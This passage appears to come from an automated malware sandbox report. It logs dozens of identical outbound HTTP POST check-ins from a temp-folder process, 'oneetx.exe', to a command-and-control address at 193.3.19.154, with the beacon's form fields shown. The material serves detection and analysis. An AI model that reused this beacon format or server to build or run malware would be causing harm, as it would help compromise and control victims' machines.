                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 24  Source IP: 192.168.2.5  Source Port: 49859  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:16.532166004 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 25  Source IP: 192.168.2.5  Source Port: 49867  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:20.790802956 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 26  Source IP: 192.168.2.5  Source Port: 49878  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:25.131287098 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 27  Source IP: 192.168.2.5  Source Port: 49887  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:29.402793884 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 28  Source IP: 192.168.2.5  Source Port: 49898  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:33.813493967 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 29  Source IP: 192.168.2.5  Source Port: 49909  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:38.049715996 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 30  Source IP: 192.168.2.5  Source Port: 49920  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:42.298825026 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 31  Source IP: 192.168.2.5  Source Port: 49930  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:46.556485891 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 32  Source IP: 192.168.2.5  Source Port: 49940  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:50.800801039 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 33  Source IP: 192.168.2.5  Source Port: 49950  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:55.048923969 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 34  Source IP: 192.168.2.5  Source Port: 49958  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:54:57.781066895 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 35  Source IP: 192.168.2.5  Source Port: 49967  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:02.021011114 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 36  Source IP: 192.168.2.5  Source Port: 49976  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:06.276736021 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 37  Source IP: 192.168.2.5  Source Port: 49987  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:10.514265060 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 38  Source IP: 192.168.2.5  Source Port: 49998  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:14.752942085 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 39  Source IP: 192.168.2.5  Source Port: 50009  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:19.005067110 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID: 40  Source IP: 192.168.2.5  Source Port: 50016  Destination IP: 193.3.19.154  Destination Port: 80  PID: 6160  Process: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp: Nov 23, 2024 20:55:23.267354965 CET  Bytes transferred: 242  Direction: OUT
                  Data:
                  POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:41
                  Source IP:192.168.2.5
                  Source Port:50017
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:27.524590969 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:42
                  Source IP:192.168.2.5
                  Source Port:50018
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:31.769241095 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:43
                  Source IP:192.168.2.5
                  Source Port:50019
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:36.015755892 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:44
                  Source IP:192.168.2.5
                  Source Port:50020
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:40.237325907 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:45
                  Source IP:192.168.2.5
                  Source Port:50021
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:44.468620062 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:46
                  Source IP:192.168.2.5
                  Source Port:50022
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:48.775316954 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:47
                  Source IP:192.168.2.5
                  Source Port:50023
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:53.018945932 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:48
                  Source IP:192.168.2.5
                  Source Port:50024
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:55:57.425158978 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:49
                  Source IP:192.168.2.5
                  Source Port:50025
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:01.674710989 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:50
                  Source IP:192.168.2.5
                  Source Port:50026
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:05.921580076 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:51
                  Source IP:192.168.2.5
                  Source Port:50027
                  Destination IP:193.3.19.154
                  Destination Port:80
                  PID:6160
                  Process:C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe
                  Timestamp:Nov 23, 2024 20:56:10.155056953 CET
                  Bytes transferred:242
                  Direction:OUT
                  Data:POST /store/games/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 193.3.19.154
                  Content-Length: 88
                  Cache-Control: no-cache
                  Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 76 73 3d 33 2e 38 30 26 73 64 3d 39 63 30 61 64 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 31 36 38 36 35 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                  Data Ascii: id=246122658369&vs=3.80&sd=9c0adb&os=1&bi=1&ar=1&pc=216865&un=user&dm=&av=13&lv=0&og=1


                  Session ID:52
